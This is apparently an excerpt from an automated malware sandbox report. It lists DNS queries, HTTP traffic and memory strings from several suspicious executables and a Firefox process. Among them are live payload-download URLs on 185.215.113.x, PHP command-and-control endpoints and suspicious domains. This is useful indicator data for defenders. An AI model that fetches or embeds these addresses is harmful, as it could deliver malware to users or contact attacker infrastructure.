GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 23 Oct 2024 13:49:17 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3210751265.000001379F221000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F6F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A9157000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3041536063.00000137A9169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3210751265.000001379F217000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E639000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F6DA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Oct 2024 13:48:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eX7gCV1K5Dls9MLA9vMjPW0W3%2BKmmI10%2Fqjs%2FAf4Zv17%2B%2ByekZEJGID%2BW4PN%2FdB6zZrjuraK2sIqLptBz4jkkduTdslSO6hpCODsvRTCJxWrDBwqsAw4JdEL%2FqcEozLsQREevQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d722ecf4bac6c4c-DFW
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: skotes.exe, 00000008.00000002.3343285649.00000000016CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000008.00000002.3343285649.00000000016CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exec613
Source: skotes.exe, 00000008.00000002.3343285649.00000000016CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exepD
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exe
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe=b
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exevbB
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2936306936.0000000001294000.00000004.00000020.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.0000000001294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/$K0u4
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/Data
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/G
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E54000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/Jp
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/M32
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp, 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)5Eu
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6-535557bcc5fa00
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/t
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ws
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37n&
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37r
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/15.113.43/ows
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/6165
Source: skotes.exe, 00000008.00000002.3343285649.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.000000000167B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpD
Source: skotes.exe, 00000008.00000002.3343285649.00000000016CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpK
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpW
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded6
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000008.00000002.3343285649.0000000001726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded?
Source: skotes.exe, 00000008.00000002.3343285649.00000000016E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpq
Source: skotes.exe, 00000008.00000002.3343285649.00000000016E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpr
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/fac00b58987e8fff7a7df309c5441f056fc49#5450#
Source: skotes.exe, 00000008.00000002.3343285649.00000000016F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ta
Source: firefox.exe, 00000019.00000003.3042142372.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000019.00000003.3042142372.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000019.00000003.3042142372.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000019.00000003.3042142372.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000019.00000002.3196543245.000001379E0DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215144753.000001379FB48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3047116966.00000137A62B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3037293440.00000137A62B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3044193469.00000137A67D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E616000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3216319833.000001379FE03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3196543245.000001379E0BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0CB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215983830.000001379FDC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3201609300.000001379E2DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000019.00000002.3240318696.00000137A1B49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3230908573.00000137A054E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3193146359.000001379C9C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3179268401.000001379A0B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E616000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799F54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3170068733.000001378E8D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3201609300.000001379E2DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F3F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlbrowserWouldUpgradeInsecureRequests_startDetection/url
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3041861836.00000137A9125000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A911E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3041861836.00000137A9125000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A911E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3033463599.00000137A91ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#Unique
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3041861836.00000137A9125000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3262908654.00000137A8F47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3267319555.00000137A911E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3040371924.00000137A8F47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGatePermission
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCapextension/webcompat
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
00000019.00000003.3098570629.00000137A0261000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3016038531.00000137A61CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2133456713.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3212088347.000001379F37D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2094889804.00000000010C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2094889804.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803081030.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000174E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2921635801.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2922291793.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 0000000B.00000003.2920845191.0000000000F31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateWRITE_ERROR_BACKGROUND_TASK_SHARING_VIOLATIONPREF_APP_UPDATE_N
Source: firefox.exe, 00000019.00000003.3042142372.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.3034748232.00000137A69BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000019.00000002.3207818517.000001379EC43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3178406027.0000013799F45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3234717923.00000137A0E84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3207362335.000001379EB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A9B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A925000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215983830.000001379FD58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD2A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3197648410.000001379E1F1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215694753.000001379FCAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3215694753.000001379FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 
00000019.00000002.3234139332.00000137A0DCF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulExpected
